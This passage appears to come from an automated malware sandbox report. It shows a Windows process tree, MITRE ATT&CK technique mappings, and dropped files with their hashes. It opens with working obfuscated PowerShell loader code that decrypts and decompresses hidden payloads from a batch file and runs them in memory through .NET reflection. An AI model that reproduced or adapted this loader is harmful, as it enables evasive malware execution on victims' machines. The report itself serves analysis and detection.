$xPYT=$KNIa.CreateDecryptor(); $BQvO=$xPYT.TransformFinalBlock($Lhlb, 0, $Lhlb.Length); $xPYT.Dispose(); $KNIa.Dispose(); $BQvO;}function OkiP($Lhlb){ Invoke-Expression -InformationAction Ignore -Verbose '$ZKQY=Ncdecdwcd-cdOcdbcdjcdecdctcd Scdycdscdtecdmcd.cdIcdO.cdMcdecdmocdrcdyScdtcdrcdecdacdm(,$Lhlb);'.Replace('cd', ''); Invoke-Expression -InformationAction Ignore '$SIsz=Ncdecdwcd-cdOcdbcdjcdecdctcd Scdycdscdtecdmcd.cdIcdO.cdMcdecdmocdrcdyScdtcdrcdecdacdm;'.Replace('cd', ''); Invoke-Expression -Debug -InformationAction Ignore '$Cswx=Nbnebnwbn-bnObnbbnjbnebnctbn Sbnybnsbntebnmbn.bnIbnO.bnCbnobnmpbnrbnesbnsbnibnobnnbn.bnGZbnibnpbnStbnrbneabnm($ZKQY, [bnIbnObn.bnCbnobnmbnpbnrebnssbnibnobnn.bnCbnobnmbnprbnebnsbnsibnobnnMbnobndbnebn]bn:bn:Dbnebncbnombnpbnrebnssbn);'.Replace('bn', ''); $Cswx.CopyTo($SIsz); $Cswx.Dispose(); $ZKQY.Dispose(); $SIsz.Dispose(); $SIsz.ToArray();}function xNUW($Lhlb,$PBcK){ Invoke-Expression -WarningAction Inquire '$ibma=[WNSWNyWNsWNtWNeWNmWN.WNReWNflWNeWNcWNtiWNoWNnWN.WNAsWNsWNeWNmbWNlWNy]WN:WN:WNLWNoWNaWNd([byte[]]$Lhlb);'.Replace('WN', ''); Invoke-Expression -InformationAction Ignore -WarningAction Inquire -Verbose -Debug '$mOyP=$ibma.EdXndXtdXrdXydXPdXodXidXntdX;'.Replace('dX', ''); Invoke-Expression -InformationAction Ignore -WarningAction Inquire '$mOyP.IFIIFnIFvIFoIFkIFeIF(IF$nIFulIFlIF, $PBcK);'.Replace('IF', '');}$apiD = 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat';$host.UI.RawUI.WindowTitle = $apiD;$fTnD=[System.IO.File]::ReadAllText($apiD).Split([Environment]::NewLine);foreach ($kbxa in $fTnD) { if ($kbxa.StartsWith('dzqCD')) { $XAms=$kbxa.Substring(5); break; }}$JuAS=[string[]]$XAms.Split('\');Invoke-Expression -InformationAction Ignore -Verbose -WarningAction Inquire '$wKg = OkiP (OaEd ([PdCPdoPdnPdvPdePdrPdtPd]:Pd:FPdrPdoPdmBPdaPdsPdePd64PdSPdtPdriPdnPdg($JuAS[0].Replace("#", "/").Replace("@", "A"))));'.Replace('Pd', '');Invoke-Expression -InformationAction Ignore '$qzk = OkiP (OaEd ([PdCPdoPdnPdvPdePdrPdtPd]:Pd:FPdrPdoPdmBPdaPdsPdePd64PdSPdtPdriPdnPdg($JuAS[1].Replace("#", "/").Replace("@", "A"))));'.Replace('Pd', '');Invoke-Expression -InformationAction Ignore -Debug -WarningAction Inquire -Verbose '$LwB = OkiP (OaEd ([PdCPdoPdnPdvPdePdrPdtPd]:Pd:FPdrPdoPdmBPdaPdsPdePd64PdSPdtPdriPdnPdg($JuAS[2].Replace("#", "/").Replace("@", "A"))));'.Replace('Pd', '');xNUW $wKg $null;xNUW $qzk $null;xNUW $LwB (,[string[]] (''));
        5⤵
        
        PID:5016
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -WindowStyle Hidden
        5⤵
        Suspicious use of NtCreateUserProcessOtherParentProcess
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Suspicious use of SetThreadContext
        Drops file in Windows directory
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of SetWindowsHookEx
        
        PID:2804
      - C:\Windows\System32\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /Delete /TN "$rbx-CNT1" /F
        6⤵
        
        PID:6104
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        7⤵
        
        PID:6112
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default
  2⤵
  - Enumerates system info in registry
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of WriteProcessMemory
  PID:1416
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ff8fb0a46f8,0x7ff8fb0a4708,0x7ff8fb0a4718
    3⤵
    PID:1960
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2160,16576896185863767104,17608445472823681983,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2196 /prefetch:2
    3⤵
    PID:2992
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2160,16576896185863767104,17608445472823681983,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2248 /prefetch:3
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:2732
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2160,16576896185863767104,17608445472823681983,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2636 /prefetch:8
    3⤵
    PID:5036
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,16576896185863767104,17608445472823681983,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3296 /prefetch:1
    3⤵
    PID:1056
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,16576896185863767104,17608445472823681983,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3304 /prefetch:1
    3⤵
    PID:3136
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,16576896185863767104,17608445472823681983,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4592 /prefetch:1
    3⤵
    PID:3608
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,16576896185863767104,17608445472823681983,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4728 /prefetch:1
    3⤵
    PID:1880
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,16576896185863767104,17608445472823681983,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5240 /prefetch:1
    3⤵
    PID:2872
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,16576896185863767104,17608445472823681983,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5272 /prefetch:1
    3⤵
    PID:1412
- - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2160,16576896185863767104,17608445472823681983,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4932 /prefetch:8
    3⤵
    PID:5252
- - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2160,16576896185863767104,17608445472823681983,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4932 /prefetch:8
    3⤵
    PID:5696
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,16576896185863767104,17608445472823681983,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5644 /prefetch:1
    3⤵
    PID:5904
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,16576896185863767104,17608445472823681983,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1852 /prefetch:1
    3⤵
    PID:3292
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,16576896185863767104,17608445472823681983,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3476 /prefetch:1
    3⤵
    PID:7420
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,16576896185863767104,17608445472823681983,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5420 /prefetch:1
    3⤵
    PID:7672
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2160,16576896185863767104,17608445472823681983,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=4676 /prefetch:8
    3⤵
    PID:7412
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2160,16576896185863767104,17608445472823681983,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=3848 /prefetch:2
    3⤵
    PID:5164
- C:\Windows\$nya-onimai2\GjnHVH.exe
  "C:\Windows\$nya-onimai2\GjnHVH.exe"
  2⤵
  - Executes dropped EXE
  PID:5296
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:380

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
1⤵
PID:3532

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:3724

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3972

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3820

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
1⤵
- Modifies data under HKEY_USERS
PID:3324

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
1⤵
PID:3616

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
1⤵
PID:3644

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
1⤵
- Modifies data under HKEY_USERS
PID:3988

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:2816

C:\Windows\system32\SppExtComObj.exe
C:\Windows\system32\SppExtComObj.exe -Embedding
1⤵
PID:4532

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
1⤵
PID:1836

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:4468

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
1⤵
PID:624

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:2724

C:\Windows\system32\backgroundTaskHost.exe
"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:ShellFeedsUI.AppXnj65k2d1a1rnztt2t2nng5ctmk3e76pn.mca
1⤵
PID:3612

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s PcaSvc
1⤵
PID:4176

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:516

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:2220

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:4936

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:5352

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s camsvc
1⤵
PID:5528

C:\Windows\System32\WaaSMedicAgent.exe
C:\Windows\System32\WaaSMedicAgent.exe 5cd126959bfb40531df3728350b5fea0 DTPMZOAmL06qo+LwdT7w2Q.0.1.0.0.0
1⤵
- Sets service image path in registry
- Modifies data under HKEY_USERS
PID:5196
- C:\Windows\System32\Conhost.exe
  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
  2⤵
  PID:5192

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
1⤵
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
PID:5752

C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
1⤵
- Checks BIOS information in registry
- Writes to the Master Boot Record (MBR)
- Checks SCSI registry key(s)
- Enumerates system info in registry
PID:6064

C:\Windows\servicing\TrustedInstaller.exe
C:\Windows\servicing\TrustedInstaller.exe
1⤵
PID:4860

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
1⤵
PID:5968

C:\Windows\System32\mousocoreworker.exe
C:\Windows\System32\mousocoreworker.exe -Embedding
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Modifies data under HKEY_USERS
PID:6048

C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe
C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe -Embedding
1⤵
PID:6372

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Pre-OS Boot

T1542

Bootkit

T1542.003

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Indicator Removal

T1070

Clear Windows Event Logs

T1070.001

Modify Registry

T1112

Pre-OS Boot

T1542

Bootkit

T1542.003

Credential Access

Discovery

Browser Information Discovery

T1217

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776

Filesize
404B

MD5
155d7f3e2c3334eb002c4fa5b451617f

SHA1
0d0045aac98f990c97fab22640145b5705c77801

SHA256
e2e8ef8cf4e855e45bcd23371209a0e90e24718488e5959ff4a02a3673430852

SHA512
387dfac266c4f1938e89619af605f7b938b0afd28baa275e6abfa7b379361db717ec5db9f477e7b246253b991a9b163364903860272816ca1601831d54d3a36d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
074db3a6469346f0984db93d9f6f0d8f

SHA1
cac8e72e2ebb92188242a02b79ea5f6b28e3eb22

SHA256
1f4b297a5c35acc494b9726b1f8d389f82ccb2bc2cd6caf4befafa440529005f

SHA512
dcbd3ca1ac5541fa78b21dc55d02a49d40292d6555bc88b9bda87d3f68618b39aa0688ffb6284111c6628fd2df818ca439e7f690fe2eedd44ace72d420b985b4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
36988ca14952e1848e81a959880ea217

SHA1
a0482ef725657760502c2d1a5abe0bb37aebaadb

SHA256
d7e96088b37cec1bde202ae8ec2d2f3c3aafc368b6ebd91b3e2985846facf2e6

SHA512
d04b2f5afec92eb3d9f9cdc148a3eddd1b615e0dfb270566a7969576f50881d1f8572bccb8b9fd7993724bdfe36fc7633a33381d43e0b96c4e9bbd53fc010173

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
fab8d8d865e33fe195732aa7dcb91c30

SHA1
2637e832f38acc70af3e511f5eba80fbd7461f2c

SHA256
1b034ffe38e534e2b7a21be7c1f207ff84a1d5f3893207d0b4bb1a509b4185ea

SHA512
39a3d43ef7e28fea2cb247a5d09576a4904a43680db8c32139f22a03d80f6ede98708a2452f3f82232b868501340f79c0b3f810f597bcaf5267c3ccfb1704b43

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000003

Filesize
62KB

MD5
c813a1b87f1651d642cdcad5fca7a7d8

SHA1
0e6628997674a7dfbeb321b59a6e829d0c2f4478

SHA256
df670e09f278fea1d0684afdcd0392a83d7041585ba5996f7b527974d7d98ec3

SHA512
af0d024ba1faafbd6f950c67977ed126827180a47cea9758ee51a95d13436f753eb5a7aa12a9090048a70328f6e779634c612aebde89b06740ffd770751e1c5b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000004

Filesize
67KB

MD5
69df804d05f8b29a88278b7d582dd279

SHA1
d9560905612cf656d5dd0e741172fb4cd9c60688

SHA256
b885987a52236f56ce7a5ca18b18533e64f62ab64eb14050ede93c93b5bd5608

SHA512
0ef49eeeeb463da832f7d5b11f6418baa65963de62c00e71d847183e0035be03e63c097103d30329582fe806d246e3c0e3ecab8b2498799abbb21d8b7febdc0e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000005

Filesize
19KB

MD5
1bd4ae71ef8e69ad4b5ffd8dc7d2dcb5

SHA1
6dd8803e59949c985d6a9df2f26c833041a5178c

SHA256
af18b3681e8e2a1e8dc34c2aa60530dc8d8a9258c4d562cbe20c898d5de98725

SHA512
b3ff083b669aca75549396250e05344ba2f1c021468589f2bd6f1b977b7f11df00f958bbbd22f07708b5d30d0260f39d8de57e75382b3ab8e78a2c41ef428863

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000006

Filesize
63KB

MD5
226541550a51911c375216f718493f65

SHA1
f6e608468401f9384cabdef45ca19e2afacc84bd

SHA256
caecff4179910ce0ff470f9fa9eb4349e8fb717fa1432cf19987450a4e1ef4a5

SHA512
2947b309f15e0e321beb9506861883fde8391c6f6140178c7e6ee7750d6418266360c335477cae0b067a6a6d86935ec5f7acdfdacc9edffa8b04ec71be210516

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
1KB

MD5
6bf949fda34df742d658b413a41fbc06

SHA1
802ba00fbc6b0abeb5ac5e505e8bdf0fe6e73f15

SHA256
c10e4e6584f0a756fa9b1be6b5269f29bbe68dc9bf59ad25d7dffe6990abe213

SHA512
9e49452da7e8e1988dd8399e4132c1d01c4020233847baf2a0e99f626e98ba11ac539847ba069c2ad6c6556e38905e99d79ca8961f5368704cbf37d18155c220

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
476B

MD5
69926d96be43411d19445321e11d8753

SHA1
e68a1d8d5d12e8948afde34ab231a3eb3ee051d7

SHA256
90992281f7e5308ab5344d6ecf60332db6cdcd9ddcc95d24e734fd7dff3ca38d

SHA512
8635cc58c1c5be7f8d9901b0191d353aa016c722e168aae411c05811d32c8f256f41bbdefeba8cbdf7ae4e212c8449407c176d1709e42190c1aab4d68065a168

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
09160d19010998a98cb105e5fc77fbc6

SHA1
e0046680a9021f3e3ac1c0066e517a896e450835

SHA256
a2ababc8d0fd8bf32b6b1b1decd0e387f16f810ee84c8fdfd97352ad4e0c7f44

SHA512
7030ab386f325082e5e771ce72007dc0d584a96fad5f85edceb1840bc15440965261c5579d9529505734ee886ad8ce612302c2cb231f969b8b0daecf5399af51

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
f6e451f59c772966ea87d9d755a55cf6

SHA1
2e59f9b508e12337efa850d38c54e5fa196eb178

SHA256
d0d8059def6a682484dbd6e3bf83cd651e074fc875c8c6f797f4956f767bf648

SHA512
f256a2a430048d5ee40c8853902c908d35651a9cc50bf97375d620b96d10062fe70a982d03e9c7feccbed4f04a51e265efb87b2b06eb072c74acbf522176fe1e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
7771917c4b38b55eb07200c1be7b4da2

SHA1
b39e1fd410ed285ca9ba689f3edd4dd391f38446

SHA256
5ba52d24ebaef70d58225deb935f8b1f6b488209a04dee8c3a3da3d878b26518

SHA512
145c0244f8971a22c8d4b98481b706aa60f41c0c4e05590ac222dabf4f82af326460c76b516c5b6f4cbc87cfbb920026799d2a7815e8dc6fb40d69eaa9e70dbd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
538B

MD5
0302551364c5cb3091fef370c462458a

SHA1
37ee165b89b2d46fcd30ee9fef6777247295f806

SHA256
e7d124bde44d493b717c4f214cb607c1fe7cdd3dc48f53067e643d463df75f68

SHA512
e3c75917f7005e589b6670dfeda7295daf343ca97768a7859724b157e9a85e86f439699ef057feab72d622d476a19db63d0e5a94f324a61cdd6faf5032b45242

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe5900b2.TMP

Filesize
538B

MD5
439e05dfbd6e355836587bfe86221f35

SHA1
b64f62711f0104210db7f3cd9cb9d26ae8a7428d

SHA256
f2b00eea3fd06983ee2281e73ae555c93024540a47b5e9255712e72873c7f551

SHA512
ca7ce44dfcb4790fb70a741c7bb2842ca9e7da5f9fcf8f8710854230a40143af15d44efb2812f9a121a46fadbcd773ff6c7c0dc3a65341383f18992820159c89

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
6752a1d65b201c13b62ea44016eb221f

SHA1
58ecf154d01a62233ed7fb494ace3c3d4ffce08b

SHA256
0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

SHA512
9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\fdff9e99-97ee-49ad-b251-2dbaaa8d5081.tmp

Filesize
6KB

MD5
5707632e009d31181ce79482ed7fac00

SHA1
8201b2c3a815c24676cebc534cd3647563af5269

SHA256
8a8ae49c070a554fd96bcbaa32fd57c2c8621e011a2d4e557725e4e3daad6b79

SHA512
188ad548c729f3d1d6a812b527a4f9b71565e9e962c364292adfbba48c43ea48d0b0837185ef38eb2be83827a87be65c8f8cf43f64c1ed310980db81e2b82388

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
10KB

MD5
3af904b318b5a86b6436de73cd968cda

SHA1
6976df0d7bff168d0e0b00adf5d154e409d12818

SHA256
7d7282207d16c83e064ed733c77c3506f4d549c1f2ef0aef61604dc5992393c4

SHA512
19d8450c8cbc8c754999518bc8ee49da923113275049ec505d988b73fb32de29ed0b69d625d6890a32b445461290717246c2710d6a8bf0d709a9c149b989cc5d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

Filesize
2KB

MD5
78e97326031132b73494010cd087ee81

SHA1
03d6e56ec4a1199cfbdaef4ce359121284f5bfee

SHA256
42d4af0b22b8e1b953535101b7548981d3b0d4e0c01abdc7ea71830193ff8299

SHA512
324002ea7474cfd9cea72906e2ad8234cb27acd8e109996d8ccf748edb7150d1f254012354c4e7a29212930c3c0288082fed905b4ad0b9f16f2886887f3b6620

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_rnalwyod.odg.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Windows\$nya-onimai2\GjnHVH.exe

Filesize
36KB

MD5
b943a57bdf1bbd9c33ab0d33ff885983

SHA1
1cee65eea1ab27eae9108c081e18a50678bd5cdc

SHA256
